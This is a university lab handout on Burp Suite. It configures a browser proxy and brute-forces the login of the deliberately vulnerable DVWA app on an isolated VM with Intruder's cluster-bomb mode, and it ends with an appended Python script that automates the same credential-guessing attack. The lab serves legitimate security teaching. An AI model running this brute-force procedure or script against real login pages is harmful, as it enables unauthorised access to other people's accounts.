Burp Suite Lab

Title: Burp Suite Lab
Author: Sameh Ramadan
Course: Security Engineering
Institution: Queen's University Belfast

CYB 205 Software Foundations for Cybersecurity

Burp Suite Lab

The focus of this lab is to gain introductory knowledge and experience with Burp Suite. Burp Suite is a suite of robust web application pentesting tools from the company PortSwigger (https://portswigger.net/). Burp Suite is the industry standard used by cybersecurity professionals for identifying and analyzing vulnerabilities in web applications (PentestGeek, 2018). This lab is the successor to the Kali Linux and Metasploitable2 Lab. It is vital for the success of this lab that the prior lab has been completed and that both the Kali Linux and Metasploitable2 virtual machines (VMs) are configured properly and operational. The Metasploitable2 VM is plagued with vulnerabilities; it is NOT advisable to allow this VM access to the internet. Refer to the Kali Linux and Metasploitable2 Lab if unsure of the VMs’ network configuration.

1. From the Metasploitable2 webpage, select DVWA (Damn Vulnerable Web Application).

2. At the login screen of DVWA input the default username of “admin” all lowercase and the default password of “password” also all lowercase.


3. Upon successful login, the DVWA homepage is presented.

4. Next, set the DVWA security level. Select the “DVWA Security” button on the right-hand side of the page. Set the security level to “low” using the dropdown selection and “submit.”

5. The Firefox web browser must be configured to interact with Burp Suite. To do this, the browser must be configured to use a “manual proxy.” To set a “manual proxy,” click the three small horizontal lines (sometimes referred to as “the hamburger”) in the upper right-hand corner of the Firefox browser.


6. When the hamburger is selected, a fly-out menu appears. From the fly-out menu, select “Preferences.”

7. Next, select the “Advanced” option on the left-hand side. On the “Network” tab, select the “Settings” button.

8. When the “Settings” menu opens, configure the “Manual proxy configuration.” The “HTTP Proxy” address must be “127.0.0.1” and the “Port” set to “8080”, which is the socket Burp Suite listens on by default. Ensure the “No Proxy for” box is completely empty; delete any information in this box, otherwise requests to the listed hosts bypass Burp and never appear in its history. Click “Ok” to continue.


9. Close the “Preferences” tab and return to DVWA.

10. Start “Burp Suite” by selecting its icon from the left-hand side Kali Linux menu. Alternatively, open the “Applications” menu at the top left-hand side and select “Burp Suite” from the favorites menu.

11. When Burp Suite launches, leave the defaults and click “Next.”


12. Click “Start Burp” to start Burp Suite with the default settings.

13. When the full Burp Suite application opens, select the “Proxy” tab and then the “Intercept” tab. If the button reads “Intercept is on”, click it so that it reads “Intercept is off.” For this exercise intercept is left off so that each request does not have to be forwarded manually; Firefox still sends all of its traffic through Burp Suite because of the earlier proxy setup, and every request and response is recorded in the “HTTP history” tab.

14. Check the “Proxy Listeners” in Burp Suite to ensure the settings match those of the Firefox browser. Click the “Options” tab and ensure the “Interface” is set to the loopback IP of 127.0.0.1 with port 8080 and that “Running” is checked. An IP address and port written together (127.0.0.1:8080) is a socket address, and it should appear directly under the “Interface” column; if not, select the listener, click “Edit” on the left-hand side and make corrections. Keep this window open.


15. With Firefox and Burp Suite properly configured, it is time to start a brute force attack on a web application login page. At the DVWA homepage, select the “Brute Force” option on the left. Also, ensure the security level is set to low as shown in the lower left corner.

16. Enter any username and password in the form and click “Login” (use your imagination and pretend you don’t know the credentials). Now go to Burp Suite and check the “HTTP history” tab. Look for a row with “200” in the “Status” column and “username” in the “URL” field. A 200 means the server answered the request successfully; it does not mean the login succeeded, because DVWA returns 200 for wrong credentials as well (for more on server response codes see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status).


17. Look at the information presented. The line with the “200” server response code is highlighted, and the host and URL details are shown in the “Raw” tab below. Because the low-security form submits by GET, the credentials entered in the DVWA web form appear in the request’s query string: the user entered “user” for the username and “qwerty” for the password. The response body tells the user that these credentials are incorrect, and that text is what the attack will key on later.


18. To simplify the brute force attack, create two text files: one with a list of possible usernames (screenshot on the left) and another with possible passwords (screenshot on the right). Since this is the free (Community) edition of Burp Suite, which throttles Intruder, keep the lists small and simple. These text files will serve as payloads for the attack.

19. In the Burp Suite “Raw” tab, right-click anywhere in the white space. When the pop-up menu appears, select “Send to Intruder.”

20. When the information is sent to the “Intruder” the “Intruder” tab will highlight orange. Select the tab.


21. Once in the “Intruder” tab, select the “Positions” sub-tab and examine the orange highlighted areas. These are the payload positions, numbered 1 to 5 in the screenshot: Burp automatically marks every parameter value it finds in the request, including the cookie values. The username is position one and the password is position two. This attack is only concerned with brute forcing positions one and two (username and password).

22. Change the attack type from “Sniper” to “Cluster bomb” via the dropdown. Cluster bomb tries every combination of one payload list per position, which is what a username list and a separate password list require. Highlight the text in the window below the “Attack type” and click the “Clear” button on the right. This removes the payload markers (the “§” characters, which look like an “S”) from all positions.

23. Double-click the username value that was entered, in this case “user”, and click the “Add” button to put the “§” markers around it. Repeat this process for the password value in the request (“qwerty” in the request shown in step 17). Placing the markers around only the username and password values ensures Burp Suite will brute force just these two positions.


24. Set the payloads in the “Payloads” tab.

a. In the “Payload Sets” section, ensure “Payload set” is “1”, which corresponds to the username position. For “Payload type” select “Runtime file” from the dropdown. In the “Payload Options [Runtime file]” section, navigate to the text file containing the list of possible usernames, highlight the file and click “Open.”

b. Repeat this process with “Payload set” “2”, using the dropdown to make the change. This time, the runtime file is the text document with the possible passwords.

25. Click the “Options” tab and scroll down to the “Grep – Match” section. Clear any text contained in the field by clicking “Clear” on the left and confirm when the dialog box appears. Next, type the word “Incorrect” in the “Add” field and click the “Add” button. This adds a column to the attack results that is checked for every response containing that word, i.e. every failed login attempt. Leave “Case sensitive match” unchecked so that the match does not depend on the capitalization DVWA uses in its response.


26. Scroll up and start the brute force attack by clicking the “Start attack” button and click “OK” when the warning dialog box appears.

27. After the attack has completed (it should not take too long), analyze the results. Look at the “Incorrect” column created from the “Grep – Match” option earlier: every failed attempt has a checkmark there. In the “Results” area, highlight a row that does NOT have an “Incorrect” checkmark (its “Length” will also differ from the failed attempts). Below the results area, select the “Response” tab and the “Render” sub-tab and look for a welcome message indicating the correct username and password.


28. Try the credentials indicated by Burp Suite on the DVWA webpage to confirm that Burp Suite successfully brute forced the username and password.

29. If the login credentials entered were successful, the “Welcome to the password protected area admin” confirmation should appear as seen below. This completes the Burp Suite lab.
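The same attack the lab drives through Intruder (steps 16 to 27), written as an added Python example that is not part of the lab: it generates the cluster-bomb combinations, builds the GET request that DVWA's low-security form sends, and classifies each response by the absence of the word "incorrect" rather than by status code, for the reason given in step 16. The Metasploitable2 address, the cookie values and the offline stand-in for the DVWA page are assumptions or constructed data, not values from the lab.

```python
"""Cluster-bomb login brute force against DVWA's "Brute Force" page (security level low).

Added example, not code from the lab. At security level "low" the DVWA form submits
the credentials as GET parameters (username, password, Login) and answers HTTP 200
whether or not they are right, so success is judged on the response body, the same
way the lab's "Grep - Match" on the word "incorrect" does.
"""
import itertools
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Iterator, List, Tuple

# Assumptions, not taken from the lab: the Metasploitable2 address and the Burp listener.
TARGET = "http://192.168.56.101/dvwa/vulnerabilities/brute/"   # assumed VM address
BURP_PROXY = "http://127.0.0.1:8080"                           # the lab's listener socket
FAIL_MARKER = "incorrect"   # present in DVWA's response to a failed login

Response = Tuple[int, str]  # (HTTP status, body)


def cluster_bomb(usernames: Iterable[str], passwords: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Burp's 'Cluster bomb': every username tried with every password."""
    return itertools.product(usernames, passwords)


def build_url(base: str, username: str, password: str) -> str:
    """The GET request DVWA's form sends at security level low."""
    query = urllib.parse.urlencode({"username": username, "password": password, "Login": "Login"})
    return f"{base}?{query}"


def login_succeeded(status: int, body: str) -> bool:
    """Mirror the lab's grep: a response *without* the failure text is a hit.

    The status code is deliberately not used: DVWA returns 200 either way, so
    filtering on status alone finds nothing.
    """
    return FAIL_MARKER not in body.lower()


def run_attack(usernames: Iterable[str], passwords: Iterable[str],
               send: Callable[[str], Response]) -> List[Tuple[str, str]]:
    """Try every combination and return the credential pairs that logged in."""
    hits = []
    for user, pw in cluster_bomb(usernames, passwords):
        status, body = send(build_url(TARGET, user, pw))
        if login_succeeded(status, body):
            hits.append((user, pw))
    return hits


def send_via_burp(session_cookie: str) -> Callable[[str], Response]:
    """Real sender: routes through the Burp listener so every attempt shows up in
    Proxy > HTTP history. DVWA needs the PHPSESSID of a logged-in session plus
    security=low, which is why a Cookie header is required (values are yours)."""
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": BURP_PROXY}))

    def send(url: str) -> Response:
        req = urllib.request.Request(url, headers={"Cookie": session_cookie})
        with opener.open(req, timeout=10) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")

    return send


def fake_dvwa(url: str, valid: Tuple[str, str] = ("admin", "password")) -> Response:
    """Constructed stand-in for the DVWA page so the example runs offline.
    Like the real page it answers 200 for both outcomes."""
    params = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    creds = (params.get("username", [""])[0], params.get("password", [""])[0])
    if creds == valid:
        return 200, f"<p>Welcome to the password protected area {creds[0]}</p>"
    return 200, "<pre><br />Username and/or password incorrect.</pre>"


if __name__ == "__main__":
    # Constructed wordlists standing in for the two text files from step 18.
    usernames = ["user", "admin", "root"]
    passwords = ["qwerty", "123456", "password"]
    print(run_attack(usernames, passwords, fake_dvwa))   # [('admin', 'password')]
    # Against the VM, through Burp (fill in your own session cookie):
    # send = send_via_burp("PHPSESSID=<value from your browser>; security=low")
    # print(run_attack(usernames, passwords, send))
```

Run against the VM, every attempt is visible in Burp's HTTP history just like the Intruder run, and the rows that differ are the ones whose body lacks the failure text, which is exactly what the lab's "Incorrect" grep column and the differing "Length" value show.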


References:

What Is Burpsuite - Tool Description. (2018). Pentest Geek. Retrieved 20 January 2018, from https://www.pentestgeek.com/what-is-burpsuite


